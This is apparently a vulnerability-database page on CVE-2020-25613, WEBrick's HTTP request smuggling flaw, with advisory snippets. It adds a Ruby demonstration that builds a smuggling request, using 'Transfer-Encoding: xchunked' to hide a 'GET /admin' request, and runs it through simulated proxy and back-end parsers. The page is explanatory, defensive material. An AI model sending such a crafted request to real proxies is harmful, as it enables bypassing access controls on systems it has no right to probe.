CVE-2020-25613

Published: 06/10/2020 Updated: 24/01/2024
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 445
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

Vulnerability Summary

An issue exists in Ruby up to and including 2.5.8, 2.6.x up to and including 2.6.6, and 2.7.x up to and including 2.7.1. WEBrick, the simple HTTP server bundled with Ruby, did not check the value of the Transfer-Encoding header rigorously. When WEBrick sits behind a reverse proxy whose own header check is also loose, the proxy and WEBrick can disagree about where a request body ends, and an attacker may exploit that disagreement to smuggle a second request past the proxy (HTTP Request Smuggling). The fix shipped in the webrick gem 1.6.1 and in Ruby 2.7.2; the version actually loaded on a host can be checked with ruby -rwebrick -e 'puts WEBrick::VERSION'.
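To make the failure mode concrete, the following is an added example written for this page; it is not WEBrick's code, nor any real proxy's. It frames the same request bytes under three Transfer-Encoding policies: a front end that accepts only the exact token chunked and otherwise falls back to Content-Length (the "poor header check" of the summary), a lenient back end that treats any value merely containing chunked as chunked (one possible loose check of the kind the summary describes, chosen to show the mechanism), and a hardened back end that rejects anything else. The request, the host name app.internal, the policy and helper names and the FramingError class are all constructed for the illustration.

```ruby
# Added illustration, not WEBrick's code: a minimal HTTP/1.1 request framer
# parameterised by a Transfer-Encoding policy, so a front end and a back end
# can be run over identical bytes and their interpretations compared.
require 'stringio'

# Front-end proxy with a loose check: only the exact token "chunked" selects
# chunked framing; any other value silently falls back to Content-Length.
PROXY_TE = ->(te) { te && te.strip.casecmp?('chunked') ? :chunked : :length }

# Lenient back end (hypothetical): any value that *contains* "chunked" is
# framed as chunked, so "xchunked" is accepted as chunked.
LENIENT_TE = ->(te) { te.to_s.match?(/chunked/i) ? :chunked : :length }

# Hardened back end: exact token => chunked, header absent => Content-Length,
# anything else => refuse to guess and reject the request.
STRICT_TE = lambda do |te|
  if te.nil?                         then :length
  elsif te.strip.casecmp?('chunked') then :chunked
  else                                    :reject
  end
end

class FramingError < StandardError; end

# Read a chunked body through the terminating zero-size chunk and any trailer
# section, leaving the stream positioned at the start of the next request.
def read_chunked(io)
  body = +''
  loop do
    size_line = io.gets("\r\n") or raise FramingError, 'truncated chunk-size line'
    size = size_line.split(';').first.to_i(16)   # chunk extensions are ignored
    break if size.zero?
    body << (io.read(size) || '')
    io.read(2)                                   # CRLF that ends the chunk data
  end
  loop { break if (t = io.gets("\r\n")).nil? || t == "\r\n" }   # skip trailers
  body
end

# Split a byte stream into the requests a parser using te_policy would see.
# Returns an array of { method:, path:, body: } hashes.
def parse_requests(raw, te_policy)
  io = StringIO.new(raw.b)
  requests = []
  until io.eof?
    request_line = io.gets("\r\n")
    break if request_line.nil? || request_line.strip.empty?
    method, path, _version = request_line.split(' ', 3)
    headers = {}
    while (line = io.gets("\r\n")) && line != "\r\n"
      name, value = line.chomp.split(':', 2)
      headers[name.strip.downcase] = value.to_s.strip
    end
    body = case te_policy.call(headers['transfer-encoding'])
           when :chunked then read_chunked(io)
           when :length  then io.read(headers.fetch('content-length', '0').to_i) || ''
           else raise FramingError, "rejected Transfer-Encoding #{headers['transfer-encoding'].inspect}"
           end
    requests << { method: method, path: path, body: body }
  end
  requests
end

# Constructed attacker request (CL.TE shape). The front end frames the body by
# Content-Length and forwards everything as one POST; a back end that honours
# "xchunked" ends the body at the zero chunk and parses the remainder as a
# second request the proxy never inspected.
SMUGGLED_REQUEST = "GET /admin HTTP/1.1\r\nHost: app.internal\r\n\r\n"
ATTACK_BODY      = "0\r\n\r\n" + SMUGGLED_REQUEST
ATTACK_REQUEST   = "POST /upload HTTP/1.1\r\n" +
                   "Host: app.internal\r\n" +
                   "Content-Length: #{ATTACK_BODY.bytesize}\r\n" +
                   "Transfer-Encoding: xchunked\r\n" +
                   "\r\n" + ATTACK_BODY

# Request lines each parser sees; raises FramingError when the policy rejects.
def paths_seen(raw, te_policy)
  parse_requests(raw, te_policy).map { |r| "#{r[:method]} #{r[:path]}" }
end

def rejected?(raw, te_policy)
  parse_requests(raw, te_policy)
  false
rescue FramingError
  true
end

if $PROGRAM_NAME == __FILE__
  puts "proxy   : #{paths_seen(ATTACK_REQUEST, PROXY_TE).inspect}"
  puts "lenient : #{paths_seen(ATTACK_REQUEST, LENIENT_TE).inspect}"
  puts "strict  : rejected=#{rejected?(ATTACK_REQUEST, STRICT_TE)}"
end
```

Run as a script, the proxy reports one request while the lenient back end reports two: the POST's Content-Length covers bytes that the back end has already consumed as a separate GET /admin, which is the desynchronisation a smuggling attack relies on. The practical check for a deployment is that the proxy and WEBrick either both reject or agree on every Transfer-Encoding value; a front end that refuses requests carrying both Content-Length and an unrecognised Transfer-Encoding removes the ambiguity on its own side, and the patched WEBrick removes it on the other.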

Vulnerable Products

ruby-lang ruby

ruby-lang webrick

fedoraproject fedora 32

fedoraproject fedora 33

Vendor Advisories

Synopsis: Important: ruby:2.6 security update. Type/Severity: Security Advisory: Important. Topic: An update for the ruby:2.6 module is now available for Red Hat Enterprise Linux 8.2 Extended Update Support. Red Hat Product Secu ...
Synopsis: Important: ruby:2.6 security update. Type/Severity: Security Advisory: Important. Topic: An update for the ruby:2.6 module is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions. Red Hat Pr ...
Debian Bug report logs - #972230: CVE-2017-17742 CVE-2019-16201 CVE-2019-16254 CVE-2019-16255 CVE-2020-25613. Package: jruby; Maintainer for jruby is Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>; Source for jruby is src:jruby (PTS, buildd, popcon). Reported by: Moritz Muehlenhoff <jmm@debian.org> ...
Debian Bug report logs - #830904: ITP: puppetserver -- the next-generation application for managing Puppet agents. Package: wnpp; Maintainer for wnpp is wnpp@debian.org. Reported by: Mathieu Parent <sathieu@debian.org>. Date: Tue, 12 Jul 2016 20:24:02 UTC. Owned by: pollo@debian.org. Severity: wishlist. Fix blocked by 972230: ...
An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request ...
The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object ...